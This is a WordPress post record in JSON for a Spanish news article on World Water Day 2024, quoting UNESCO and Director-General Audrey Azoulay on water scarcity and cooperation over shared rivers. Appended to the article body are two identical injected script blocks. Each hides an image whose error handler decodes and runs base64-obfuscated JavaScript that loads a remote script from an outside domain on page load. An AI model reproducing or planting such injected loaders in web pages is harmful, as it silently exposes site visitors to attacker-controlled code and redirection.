{"id":3888,"date":"2024-03-22T11:38:16","date_gmt":"2024-03-22T14:38:16","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3888"},"modified":"2025-08-13T23:57:50","modified_gmt":"2025-08-14T02:57:50","slug":"22-de-marzo-dia-mundial-del-agua","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3888","title":{"rendered":"22 de marzo: D\u00eda Mundial del Agua"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background has-link-color wp-elements-471228bcfa14244b3e596f48d26351cb\"><em>El D\u00eda Mundial del Agua se celebra anualmente el 22 de marzo como un medio para centrar la atenci\u00f3n en la importancia del agua dulce y abogar por la gesti\u00f3n sostenible de los recursos de agua dulce. Se trata de tomar medidas para hacer frente a la crisis mundial del agua, en apoyo del Objetivo de Desarrollo Sostenible (ODS) 6: agua y saneamiento para todos para 2030.<\/em><\/h5>\n\n\n\n<p>En 2024, el D\u00eda Mundial del Agua se centra en el agua para la prosperidad y la paz; La UNESCO y la Comisi\u00f3n Econ\u00f3mica de las Naciones Unidas para-Europa co-leaderan la celebraci\u00f3n para la ONU.<\/p>\n\n\n\n<p>La gesti\u00f3n sostenible del agua genera una gran cantidad de beneficios para las personas y las comunidades. Es a trav\u00e9s de estos beneficios que el agua conduce a la prosperidad. Y la distribuci\u00f3n equitativa de estos beneficios promueve la paz.<br>Cuando se trata de agua, compartir es verdaderamente cuidar.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.unesco.org\/en\/articles\/water-peace-official-celebration-world-water-day-2024\" target=\"_blank\" rel=\"noreferrer noopener\"><img fetchpriority=\"high\" decoding=\"async\" width=\"909\" height=\"606\" data-id=\"3889\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/Captura-de-pantalla_22-3-2024_102859_www.unesco.org_.jpeg\" alt=\"\" class=\"wp-image-3889\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/Captura-de-pantalla_22-3-2024_102859_www.unesco.org_.jpeg 909w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/Captura-de-pantalla_22-3-2024_102859_www.unesco.org_-300x200.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/Captura-de-pantalla_22-3-2024_102859_www.unesco.org_-768x512.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/Captura-de-pantalla_22-3-2024_102859_www.unesco.org_-696x464.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/Captura-de-pantalla_22-3-2024_102859_www.unesco.org_-630x420.jpeg 630w\" sizes=\"(max-width: 909px) 100vw, 909px\" \/><\/a><figcaption class=\"wp-element-caption\">Agua para la Paz: celebraci\u00f3n oficial del D\u00eda Mundial del Agua 2024<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.unesco.org\/en\/articles\/launch-2024-un-world-water-development-report-water-prosperity-and-peace\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"910\" height=\"603\" data-id=\"3890\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/Captura-de-pantalla_22-3-2024_10335_www.unesco.org_.jpeg\" alt=\"\" class=\"wp-image-3890\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/Captura-de-pantalla_22-3-2024_10335_www.unesco.org_.jpeg 910w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/Captura-de-pantalla_22-3-2024_10335_www.unesco.org_-300x199.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/Captura-de-pantalla_22-3-2024_10335_www.unesco.org_-768x509.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/Captura-de-pantalla_22-3-2024_10335_www.unesco.org_-696x461.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/Captura-de-pantalla_22-3-2024_10335_www.unesco.org_-634x420.jpeg 634w\" sizes=\"(max-width: 910px) 100vw, 910px\" \/><\/a><figcaption class=\"wp-element-caption\">Agua para la prosperidad y la paz es el t\u00edtulo del pr\u00f3ximo Informe de las Naciones Unidas sobre el Desarrollo de los Recursos H\u00eddricos en el Mundo, que se publicar\u00e1 el D\u00eda Mundial del Agua, el 22 de marzo, en la Sede de la UNESCO.<\/figcaption><\/figure>\n<\/figure>\n\n\n\n<p>En esta ocasi\u00f3n, la UNESCO desea recordar la importancia del di\u00e1logo y la cooperaci\u00f3n en el \u00e1mbito del agua, ya se trate de aguas superficiales o subterr\u00e1neas, l\u00edquidas o heladas. Esta cooperaci\u00f3n internacional no solo es conveniente, sino tambi\u00e9n necesaria cuando m\u00e1s del 40 % de la poblaci\u00f3n mundial vive en cuencas fluviales transfronterizas, que representan casi el 60 % de los recursos mundiales de agua dulce.<\/p>\n\n\n\n<p class=\"has-vivid-cyan-blue-color has-text-color has-link-color wp-elements-1f9dd93313d5139b3e130ac649d42cb0\"><strong><em>Mensaje de la Sra. Audrey Azoulay, directora general de la UNESCO, con motivo del D\u00eda Mundial del Agua 22 de marzo de 2024.<\/em><\/strong><\/p>\n\n\n\n<p>Actualmente, una de cada dos personas en todo el mundo padece escasez de agua durante varios meses al a\u00f1o1. Y en ciertas regiones del planeta, esta escasez de agua, que antes era la excepci\u00f3n, se ha convertido en la regla.<\/p>\n\n\n\n<p>Conocemos las consecuencias de esta situaci\u00f3n: la escasez de agua no solo agrava las tensiones geopol\u00edticas, sino que tambi\u00e9n supone una amenaza para todos los derechos fundamentales, por ejemplo, al debilitar considerablemente la condici\u00f3n de las ni\u00f1as y las mujeres. En muchas zonas rurales, las ni\u00f1as y mujeres son las principales encargadas de recoger el agua y dedican varias horas al d\u00eda a esta tarea, lo que pone en peligro su acceso a la educaci\u00f3n y su participaci\u00f3n en la vida econ\u00f3mica.<\/p>\n\n\n\n<p>Por consiguiente, el acceso al agua y la preservaci\u00f3n de los recursos h\u00eddricos son retos fundamentales para la sociedad que exigen nuevas modalidades de consumo y gesti\u00f3n de este preciado recurso.<\/p>\n\n\n\n<p>Estas son las conclusiones de nuestro \u00faltimo Informe mundial sobre el desarrollo de los recursos h\u00eddricos, coordinado por la UNESCO en nombre de ONU-Agua.<\/p>\n\n\n\n<p>Este informe se publica anualmente con motivo del D\u00eda Mundial del Agua, el 22 de marzo. Tanto el informe de este a\u00f1o como la edici\u00f3n de 2024 del D\u00eda Mundial del Agua se dedican al tema \u201cAgua para la prosperidad y la paz\u201d.<\/p>\n\n\n\n<p>En esta ocasi\u00f3n, la UNESCO desea recordar la importancia del di\u00e1logo y la cooperaci\u00f3n en el \u00e1mbito del agua, ya se trate de aguas superficiales o subterr\u00e1neas, l\u00edquidas o heladas. Esta cooperaci\u00f3n internacional no solo es conveniente, sino tambi\u00e9n necesaria cuando m\u00e1s del 40 % de la poblaci\u00f3n mundial vive en cuencas fluviales transfronterizas, que representan casi el 60 % de los recursos mundiales de agua dulce.<\/p>\n\n\n\n<p>A fin de fomentar la cooperaci\u00f3n internacional en el \u00e1mbito del agua, la UNESCO lleva a cabo una serie de iniciativas. Por ejemplo, en la regi\u00f3n del Gran Mekong, que incluye Camboya, Laos, Tailandia y Vietnam, estamos intensificando la utilizaci\u00f3n de los recursos de aguas subterr\u00e1neas como medio de adaptaci\u00f3n al cambio clim\u00e1tico. En esa misma l\u00ednea, la Organizaci\u00f3n ha establecido un marco de gesti\u00f3n com\u00fan del acu\u00edfero de Stampriet, situado entre Botswana, Namibia y Sud\u00e1frica.<\/p>\n\n\n\n<p>La UNESCO tambi\u00e9n presta apoyo t\u00e9cnico a los Estados Miembros para garantizar la calidad de los recursos de agua dulce. La Organizaci\u00f3n ha puesto en marcha una plataforma innovadora para la vigilancia operacional por sat\u00e9lite de la calidad del agua en dos cuencas transfronterizas: la del lago Chad, que abarca el Camer\u00fan, la Rep\u00fablica Centroafricana, el N\u00edger, Nigeria y el Chad, y la del R\u00edo de la Plata, que riega la Argentina, Bolivia, el Paraguay y el Uruguay.<\/p>\n\n\n\n<p>El tema del D\u00eda Mundial del Agua de 2024 es, pues, un llamamiento a la acci\u00f3n \u2013para gestionar el agua de forma sostenible, restablecer los lazos con nuestro planeta y, en \u00faltima instancia, construir la paz. Como se\u00f1al\u00f3 en 2021 el artista brasile\u00f1o y Embajador de Buena Voluntad de la UNESCO Vik Muniz, \u201csolo hay una Tierra, no un planeta para la naturaleza y otro para los humanos\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.unesco.org\/es\/days\/world-water\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/03\/Captura-de-pantalla_22-3-2024_104759_www.unesco.org_.jpeg\" alt=\"\" class=\"wp-image-8075\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El D\u00eda Mundial del Agua se celebra anualmente el 22 de marzo como un medio para centrar la atenci\u00f3n en la importancia del agua dulce y abogar por la gesti\u00f3n sostenible de los recursos de agua dulce. Se trata de tomar medidas para hacer frente a la crisis mundial del agua, en apoyo del Objetivo [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3889,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[22],"tags":[],"class_list":{"0":"post-3888","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3888"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3888"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3888\/revisions"}],"predecessor-version":[{"id":6813,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3888\/revisions\/6813"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3889"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3888"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3888"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3888"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}